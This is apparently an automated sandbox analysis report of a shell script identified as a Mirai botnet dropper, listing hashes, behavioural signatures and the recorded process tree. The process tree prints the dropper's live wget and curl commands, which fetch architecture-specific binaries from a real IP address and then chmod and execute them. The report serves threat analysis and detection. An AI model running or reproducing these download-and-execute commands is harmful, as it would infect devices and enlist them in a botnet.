Analysis

  • max time kernel
    149s
  • max time network
    137s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    03-01-2025 03:38

General

  • Target

    74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh

  • Size

    2KB

  • MD5

    ed9afc8adb1a34f93090873f6b76ec07

  • SHA1

    13b5f418f63a32c61e493995e10e3baa0b02caab

  • SHA256

    74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091

  • SHA512

    3ef263bf7ef4cadcc3587d3ef891289cb051087c9d125a74fc8f34f16cda89ca79c2a5ae6f2d0edee3f87855de37af4a594779d6d0d332beade0654e102bd049

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification 1 TTPs 15 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 15 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Writes file to system bin folder 2 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads runtime system information 56 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 28 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh
    /tmp/74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh
    1⤵
    • Writes file to tmp directory
    PID:715
    • /usr/bin/wget
      wget http://45.95.169.120/hiddenbin/wind.x86
      2⤵
      • Writes file to tmp directory
      PID:718
    • /usr/bin/curl
      curl -O http://45.95.169.120/hiddenbin/wind.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:733
    • /bin/cat
      cat wind.x86
      2⤵
        PID:743
      • /bin/chmod
        chmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.x86 WTF
        2⤵
        • File and Directory Permissions Modification
        PID:744
      • /tmp/WTF
        ./WTF
        2⤵
        • Executes dropped EXE
        PID:745
      • /usr/bin/wget
        wget http://45.95.169.120/hiddenbin/wind.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:747
      • /usr/bin/curl
        curl -O http://45.95.169.120/hiddenbin/wind.mips
        2⤵
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:749
      • /bin/cat
        cat wind.mips
        2⤵
        • System Network Configuration Discovery
        PID:750
      • /bin/chmod
        chmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.mips wind.x86 WTF
        2⤵
        • File and Directory Permissions Modification
        PID:751
      • /tmp/WTF
        ./WTF
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Writes file to system bin folder
        • Reads runtime system information
        PID:752
      • /usr/bin/wget
        wget http://45.95.169.120/hiddenbin/wind.arc
        2⤵
        • Writes file to tmp directory
        PID:756
      • /usr/bin/curl
        curl -O http://45.95.169.120/hiddenbin/wind.arc
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:757
      • /bin/cat
        cat wind.arc
        2⤵
          PID:762
        • /bin/chmod
          chmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.arc wind.mips wind.x86 WTF
          2⤵
          • File and Directory Permissions Modification
          PID:763
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          PID:765
        • /usr/bin/wget
          wget http://45.95.169.120/hiddenbin/wind.i468
          2⤵
            PID:768
          • /usr/bin/curl
            curl -O http://45.95.169.120/hiddenbin/wind.i468
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:775
          • /bin/cat
            cat wind.i468
            2⤵
              PID:780
            • /bin/chmod
              chmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.arc wind.i468 wind.mips wind.x86 WTF
              2⤵
              • File and Directory Permissions Modification
              PID:782
            • /tmp/WTF
              ./WTF
              2⤵
              • Executes dropped EXE
              PID:784
            • /usr/bin/wget
              wget http://45.95.169.120/hiddenbin/wind.i686
              2⤵
                PID:785
              • /usr/bin/curl
                curl -O http://45.95.169.120/hiddenbin/wind.i686
                2⤵
                • Reads runtime system information
                • Writes file to tmp directory
                PID:792
              • /bin/cat
                cat wind.i686
                2⤵
                  PID:799
                • /bin/chmod
                  chmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.arc wind.i468 wind.i686 wind.mips wind.x86 WTF
                  2⤵
                  • File and Directory Permissions Modification
                  PID:800
                • /tmp/WTF
                  ./WTF
                  2⤵
                  • Executes dropped EXE
                  PID:802
                • /usr/bin/wget
                  wget http://45.95.169.120/hiddenbin/wind.x86_64
                  2⤵
                    PID:804
                  • /usr/bin/curl
                    curl -O http://45.95.169.120/hiddenbin/wind.x86_64
                    2⤵
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:811
                  • /bin/cat
                    cat wind.x86_64
                    2⤵
                      PID:818
                    • /bin/chmod
                      chmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.arc wind.i468 wind.i686 wind.mips wind.x86 wind.x86_64 WTF
                      2⤵
                      • File and Directory Permissions Modification
                      PID:819
                    • /tmp/WTF
                      ./WTF
                      2⤵
                      • Executes dropped EXE
                      PID:821
                    • /usr/bin/wget
                      wget http://45.95.169.120/hiddenbin/wind.mpsl
                      2⤵
                      • Writes file to tmp directory
                      PID:822
                    • /usr/bin/curl
                      curl -O http://45.95.169.120/hiddenbin/wind.mpsl
                      2⤵
                      • Reads runtime system information
                      • Writes file to tmp directory
                      PID:823
                    • /bin/cat
                      cat wind.mpsl
                      2⤵
                        PID:824
                      • /bin/chmod
                        chmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.arc wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF
                        2⤵
                        • File and Directory Permissions Modification
                        PID:825
                      • /tmp/WTF
                        ./WTF
                        2⤵
                        • Executes dropped EXE
                        PID:826
                      • /usr/bin/wget
                        wget http://45.95.169.120/hiddenbin/wind.arm
                        2⤵
                        • Writes file to tmp directory
                        PID:828
                      • /usr/bin/curl
                        curl -O http://45.95.169.120/hiddenbin/wind.arm
                        2⤵
                        • Reads runtime system information
                        • Writes file to tmp directory
                        PID:829
                      • /bin/cat
                        cat wind.arm
                        2⤵
                          PID:830
                        • /bin/chmod
                          chmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.arc wind.arm wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF
                          2⤵
                          • File and Directory Permissions Modification
                          PID:831
                        • /tmp/WTF
                          ./WTF
                          2⤵
                          • Executes dropped EXE
                          PID:832
                        • /usr/bin/wget
                          wget http://45.95.169.120/hiddenbin/wind.arm5
                          2⤵
                          • Writes file to tmp directory
                          PID:834
                        • /usr/bin/curl
                          curl -O http://45.95.169.120/hiddenbin/wind.arm5
                          2⤵
                          • Reads runtime system information
                          • Writes file to tmp directory
                          PID:835
                        • /bin/cat
                          cat wind.arm5
                          2⤵
                            PID:844
                          • /bin/chmod
                            chmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.arc wind.arm wind.arm5 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF
                            2⤵
                            • File and Directory Permissions Modification
                            PID:846
                          • /tmp/WTF
                            ./WTF
                            2⤵
                            • Executes dropped EXE
                            PID:848
                          • /usr/bin/wget
                            wget http://45.95.169.120/hiddenbin/wind.arm6
                            2⤵
                            • Writes file to tmp directory
                            PID:852
                          • /usr/bin/curl
                            curl -O http://45.95.169.120/hiddenbin/wind.arm6
                            2⤵
                            • Reads runtime system information
                            • Writes file to tmp directory
                            PID:858
                          • /bin/cat
                            cat wind.arm6
                            2⤵
                              PID:867
                            • /bin/chmod
                              chmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.arc wind.arm wind.arm5 wind.arm6 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF
                              2⤵
                              • File and Directory Permissions Modification
                              PID:869
                            • /tmp/WTF
                              ./WTF
                              2⤵
                              • Executes dropped EXE
                              PID:870
                            • /usr/bin/wget
                              wget http://45.95.169.120/hiddenbin/wind.arm7
                              2⤵
                              • Writes file to tmp directory
                              PID:873
                            • /usr/bin/curl
                              curl -O http://45.95.169.120/hiddenbin/wind.arm7
                              2⤵
                              • Reads runtime system information
                              • Writes file to tmp directory
                              PID:877
                            • /bin/cat
                              cat wind.arm7
                              2⤵
                                PID:878
                              • /bin/chmod
                                chmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-i4ptSw wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF
                                2⤵
                                • File and Directory Permissions Modification
                                PID:879
                              • /tmp/WTF
                                ./WTF
                                2⤵
                                • Executes dropped EXE
                                PID:880
                              • /usr/bin/wget
                                wget http://45.95.169.120/hiddenbin/wind.ppc
                                2⤵
                                • Writes file to tmp directory
                                PID:882
                              • /usr/bin/curl
                                curl -O http://45.95.169.120/hiddenbin/wind.ppc
                                2⤵
                                • Reads runtime system information
                                • Writes file to tmp directory
                                PID:883
                              • /bin/cat
                                cat wind.ppc
                                2⤵
                                  PID:887
                                • /bin/chmod
                                  chmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.ppc wind.x86 wind.x86_64 WTF
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:888
                                • /tmp/WTF
                                  ./WTF
                                  2⤵
                                  • Executes dropped EXE
                                  PID:889
                                • /usr/bin/wget
                                  wget http://45.95.169.120/hiddenbin/wind.spc
                                  2⤵
                                  • Writes file to tmp directory
                                  PID:891
                                • /usr/bin/curl
                                  curl -O http://45.95.169.120/hiddenbin/wind.spc
                                  2⤵
                                  • Reads runtime system information
                                  • Writes file to tmp directory
                                  PID:892
                                • /bin/cat
                                  cat wind.spc
                                  2⤵
                                    PID:893
                                  • /bin/chmod
                                    chmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.ppc wind.spc wind.x86 wind.x86_64 WTF
                                    2⤵
                                    • File and Directory Permissions Modification
                                    PID:894
                                  • /tmp/WTF
                                    ./WTF
                                    2⤵
                                    • Executes dropped EXE
                                    PID:895
                                  • /usr/bin/wget
                                    wget http://45.95.169.120/hiddenbin/wind.m68k
                                    2⤵
                                    • Writes file to tmp directory
                                    PID:897
                                  • /usr/bin/curl
                                    curl -O http://45.95.169.120/hiddenbin/wind.m68k
                                    2⤵
                                    • Reads runtime system information
                                    • Writes file to tmp directory
                                    PID:898
                                  • /bin/cat
                                    cat wind.m68k
                                    2⤵
                                      PID:899
                                    • /bin/chmod
                                      chmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.m68k wind.mips wind.mpsl wind.ppc wind.spc wind.x86 wind.x86_64 WTF
                                      2⤵
                                      • File and Directory Permissions Modification
                                      PID:900
                                    • /tmp/WTF
                                      ./WTF
                                      2⤵
                                      • Executes dropped EXE
                                      PID:901
                                    • /usr/bin/wget
                                      wget http://45.95.169.120/hiddenbin/wind.sh4
                                      2⤵
                                      • Writes file to tmp directory
                                      PID:903
                                    • /usr/bin/curl
                                      curl -O http://45.95.169.120/hiddenbin/wind.sh4
                                      2⤵
                                      • Reads runtime system information
                                      • Writes file to tmp directory
                                      PID:904
                                    • /bin/cat
                                      cat wind.sh4
                                      2⤵
                                        PID:905
                                      • /bin/chmod
                                        chmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.m68k wind.mips wind.mpsl wind.ppc wind.sh4 wind.spc wind.x86 wind.x86_64 WTF
                                        2⤵
                                        • File and Directory Permissions Modification
                                        PID:906
                                      • /tmp/WTF
                                        ./WTF
                                        2⤵
                                        • Executes dropped EXE
                                        PID:907

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • /tmp/WTF

                                      Filesize

                                      27KB

                                      MD5

                                      31695f8e13cc48d85194f28fae5b9947

                                      SHA1

                                      c0aeffac04584edd671c647e93cfe3732357bca4

                                      SHA256

                                      43756b412067a771fb68c6df35ccaf2e5668de697e189cd2a6f847ed5434d20d

                                      SHA512

                                      7c1bd7c1857a825e1ddfafc3fc67a0e9a9221ab3ed64374f7a943f91fe08e19b6c200976bae214963c7f2cd1cf3c42624e35de03d125604b1da3a3eb5c914956

                                    • /tmp/WTF

                                      Filesize

                                      113KB

                                      MD5

                                      a1fe5416e612e6715d590130c2a5a9ca

                                      SHA1

                                      fc47c47eef1e5a037446eb9e0d2b1711bf5975a3

                                      SHA256

                                      212660d32a279ad8f1965a28df06992c62b714d52142e5389e03b5835664043c

                                      SHA512

                                      8213076bfba398bb77df85c68ca8d1467b5197a2082237f54017ef0124133d6f63b4b85215916576a2392835f945a6f9c09bc710898993fc99a44f1d740ca890

                                    • /tmp/WTF

                                      Filesize

                                      217B

                                      MD5

                                      b5c5bc11ee843c629fe4dc7b16d9e3c8

                                      SHA1

                                      b4f2fc81c39d2c053c55ee06a161655f6546a372

                                      SHA256

                                      40e81787af6d49bfd5ff0dd8a740f823899d31ddf509e41b10165b13a8cc6e39

                                      SHA512

                                      fe3c0c15734685ad54a0068e56cd4247e7cf4716257d25e1916fc69e2c0d7a490166b3802339fff264e3e4ef86d2d4c156f5866eb931e99dce15ad64c96f1a16

                                    • /tmp/WTF

                                      Filesize

                                      217B

                                      MD5

                                      7996ac0d48cf7290dc39acdf4c6cbe78

                                      SHA1

                                      6949f5ef62883990e34538ee5bfdab36b5ddddde

                                      SHA256

                                      96db2cd9e9a66997acbc90e8f591e6b1696bb47500d1d07db2d20e3c92de70a8

                                      SHA512

                                      0eb9e26445b177be128aa076110ff2d3488641347c17eef3f2e44b50bb9fe18f4c7fa10cccf2985801fbfd5fcc5c163cf141452850927aa58f623737a9d9488a

                                    • /tmp/WTF

                                      Filesize

                                      65KB

                                      MD5

                                      c232c1fad117a92e3a2641a8d5b0a173

                                      SHA1

                                      d36db31c60f484389283201ef23b674f95c36b65

                                      SHA256

                                      291e21671679a5dcec245190911c7c059c1a6ec0b74875bd990e56bbb0ec71ef

                                      SHA512

                                      c9f1028c71922f9683c641907fcb790f3e63594788d5e6db2e41d3aa9ec4945fdaa41c209468452a24cf8428e7d40498ac001be2a5ef897743a9c0ef1ddc4c01

                                    • /tmp/wind.x86

                                      Filesize

                                      25KB

                                      MD5

                                      819856ae59567a9a45f09a578a8701d6

                                      SHA1

                                      f10479dba7d8ce69c749bd30461ba4a1e0a75833

                                      SHA256

                                      f1eb1a307496e1f0468c7a40e8b64d35e0052d9d1654d4a06b444c8218f9be38

                                      SHA512

                                      10223b4bb6d324eeb9d3d0313e4d16b31dbd4111fb0f9c5b5319e539277c0d05dcf67ac802b9c45fbb7248884370cc0ff0855547e5e39b8930aab2e8105090cb